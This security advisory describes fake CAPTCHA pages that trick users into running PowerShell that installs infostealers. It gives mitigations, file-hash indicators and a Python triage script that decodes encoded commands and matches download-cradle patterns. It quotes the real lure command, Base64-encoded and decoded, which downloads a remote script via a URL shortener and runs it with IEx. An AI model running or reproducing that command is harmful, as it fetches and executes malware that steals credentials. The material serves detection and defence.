Uptick in Fake CAPTCHA Campaigns Trick Users to Deliver Malware

Executive Summary

Beazley Security has identified an increase in cybercriminal campaigns that use fake CAPTCHA pages to distribute infostealers and Remote Access Trojans (RATs). The pages trick victims into executing malicious PowerShell commands that stage and run the malware. These attacks lead to credential theft and give threat actors remote access to infected systems, which is often leveraged as part of a ransomware attack.

Beazley Security advises organizations to implement technical controls that prevent regular users from executing PowerShell. Furthermore, it is recommended that organizations provide targeted employee training to address this emerging threat effectively.

Technical Details

Beazley Security has observed multiple cases where victims were lured through malicious advertisements to fake CAPTCHA pages, where a social engineering prompt framed as a check that they are human tricks them into executing malicious PowerShell commands.

The common component in each incident is a fake CAPTCHA malware delivery system visualized below:

Figure 1: Screenshot of fake CAPTCHA lure

Source: https://labs.guard.io/deceptionads-fake-captcha-driving-infostealer-infections-and-a-glimpse-to-the-dark-side-of-0c516f4dc0b6

More details of the attack kill chain are visualized below:

Figure 2: Fake CAPTCHA Malware Delivery Attack Chain

These CAPTCHA landing pages purportedly include a JavaScript snippet that automatically copies the malicious PowerShell command to the user’s clipboard, which lowers the victim’s suspicion during the social engineering.

In most publicly reported incidents, the malicious PowerShell commands staged and installed infostealer malware onto victims’ devices. Infostealer malware such as Lumma is designed to harvest user information, including credentials, session cookies, credit card information, browsing history, and even cryptocurrency wallets.

It should be noted that the PowerShell commands could be modified to deliver any family of malware in a given campaign.

Mitigations / Workarounds

A defense-in-depth approach is recommended to protect against these types of social engineering attacks:

  • Restrict PowerShell execution for non-administrative users through group policy or Intune configurations, if possible.
  • Implement security awareness training to include instruction on recognizing this fake CAPTCHA social engineering technique, the dangers of clicking on suspicious ads, and the importance of never running PowerShell commands or downloading files when prompted to do so from untrusted websites.
  • Utilize URL link protection in email and web browsing. Also implement DNS filtering solutions that can detect and prevent users from navigating to watering hole and phishing sites.
  • Deploy modern endpoint detection and response (EDR) solutions that can detect suspicious user-invoked behavior and malicious scripts.
  • Reset credentials if any account compromise has been suspected.

Indicators of Compromise

Aside from the fake CAPTCHA, the primary component of this attack is the arbitrary PowerShell payload that gets pasted into the Windows Command Prompt. Across all documented incidents, the PowerShell commands presented to victims contained a large Base64-encoded string as an obfuscation step. See an example below:

"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -win 1 -ep bypass -noni -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAbAB5AC4AYwB4AC8AUwBYADEAMAAnACkAIAB8ACAASQBFAHgA

When decoded, these payloads instantiate a PowerShell web client to fetch and run a payload hosted behind a URL shortener service, in this case bitly[.]cx (though we’ve seen several URL shorteners):

(New-Object Net.WebClient).DownloadString('https://bitly[.]cx/SX10') | IEx
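The -enc argument is Base64 over UTF-16LE text, so a SOC analyst can recover and triage the real command from a process-creation log without running it. The following Python helper is an added example, not Beazley Security's tooling: it extracts the encoded argument from a command line, decodes it, pulls out any URLs, and scores the flags and cradle patterns seen in this campaign (-ep bypass, hidden window, -noni, DownloadString piped to IEx, a URL shortener). The encoded string is the one quoted above; the log lines and the benign comparison command are constructed, and the indicator weights are arbitrary choices for illustration.

```python
"""Triage helper for PowerShell -EncodedCommand one-liners (added example)."""
import base64
import re
from typing import Optional

# PowerShell accepts any unambiguous prefix: -e, -ec, -enc, -EncodedCommand.
# "-ep" (ExecutionPolicy) must not match, hence the mandatory whitespace.
ENC_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)

# Indicators on the outer command line (flags as logged by EDR / event 4688).
FLAG_INDICATORS = {
    "execution policy bypass": re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I),
    "hidden window": re.compile(r"-w(?:in(?:dowstyle)?)?\s+(?:1|hidden)\b", re.I),
    "non-interactive": re.compile(r"-noni(?:nteractive)?\b", re.I),
}
# Indicators inside the decoded script (download-and-execute cradle).
DECODED_INDICATORS = {
    "download cradle": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b", re.I),
    "invoke-expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "url shortener": re.compile(r"bitly\.|bit\.ly|tinyurl|t\.co/", re.I),
}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand text, or None if absent or undecodable."""
    match = ENC_ARG.search(cmdline)
    if not match:
        return None
    b64 = match.group(1)
    b64 += "=" * (-len(b64) % 4)  # restore padding a logger may have truncated
    try:
        return base64.b64decode(b64).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def triage(cmdline: str) -> dict:
    """Decode the command line and report URLs, matched indicators and a verdict."""
    decoded = decode_encoded_command(cmdline)
    hits = [name for name, rx in FLAG_INDICATORS.items() if rx.search(cmdline)]
    urls = []
    if decoded is not None:
        hits += [name for name, rx in DECODED_INDICATORS.items() if rx.search(decoded)]
        urls = URL_RE.findall(decoded)
    # Verdict rule (arbitrary for illustration): a download cradle piped into
    # Invoke-Expression is enough on its own; otherwise require three indicators.
    cradle_to_iex = "download cradle" in hits and "invoke-expression" in hits
    return {
        "decoded": decoded,
        "urls": urls,
        "indicators": hits,
        "suspicious": cradle_to_iex or len(hits) >= 3,
    }


# The Base64 string quoted in the advisory.
ADVISORY_B64 = (
    "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4A"
    "RABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQA"
    "bAB5AC4AYwB4AC8AUwBYADEAMAAnACkAIAB8ACAASQBFAHgA"
)

# Constructed sample command lines, as a process-creation event would record them.
SAMPLE_CMDLINES = [
    # The advisory's lure command.
    '"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe" '
    "-win 1 -ep bypass -noni -enc " + ADVISORY_B64,
    # Constructed benign administrative use of -enc (wraps Get-Date, no other flags).
    "powershell.exe -enc "
    + base64.b64encode("Get-Date".encode("utf-16-le")).decode("ascii"),
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        result = triage(line)
        print("suspicious" if result["suspicious"] else "benign   ",
              result["indicators"], result["urls"])
        print("  decoded:", result["decoded"])
```

The decoder deliberately tolerates missing padding, because command-line fields in some logs are truncated; if the decoded text contains a URL, that URL (and the shortener it sits behind) is the pivot for blocking and for hunting other hosts that resolved it.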

File hashes (SHA-1) of infostealer malware observed after PowerShell execution include the following:

  • ce4cee2bc712ecc7fac8f6ad14b7fc237ee1ebca borlndmm.dll
  • 9f72e339a99efb3c1ec7bbdaaa28e27ab0bbd56d cc32290mt.dll
  • 5a143c728b44602f83d0c9d4f90d310841423607 legatee.vhd
  • a7fe94c226500c27d740ed5943340fa7d6c01577 protolanguage.php
  • 7b520ff8bd1b552e3de00a38a87722f21dc1c9f4 zkwindow.exe
  • 1b5fd5739d66cdbb3d08b3d11b45bf49851bc4e0 AUpdate.exe
  • 13a9012191b5a59e1e3135c3953e8af63eb1b513 XceedZip.dll
  • 98181cd24ccfdb8d2929c53145fe68cac25911db gypsophila.deb
  • 1a45049a9d41cb83a9b2648a9e39b44fea043d25 sarape.gz

Infrastructure responsible for delivering infostealer malware observed by Beazley Security eventually redirects to web servers hosted behind Cloudflare's Content Delivery Network (CDN) services, likely to enhance flexibility in rotating target delivery servers and staging campaigns.

How Beazley Security is Responding

Beazley Security is actively monitoring client environments to detect any attempts that leverage fake CAPTCHA attacks to trick clients into downloading and executing malware.

We are also conducting threat hunts across MDR environments to detect and contain novel variations of this attack as it evolves.
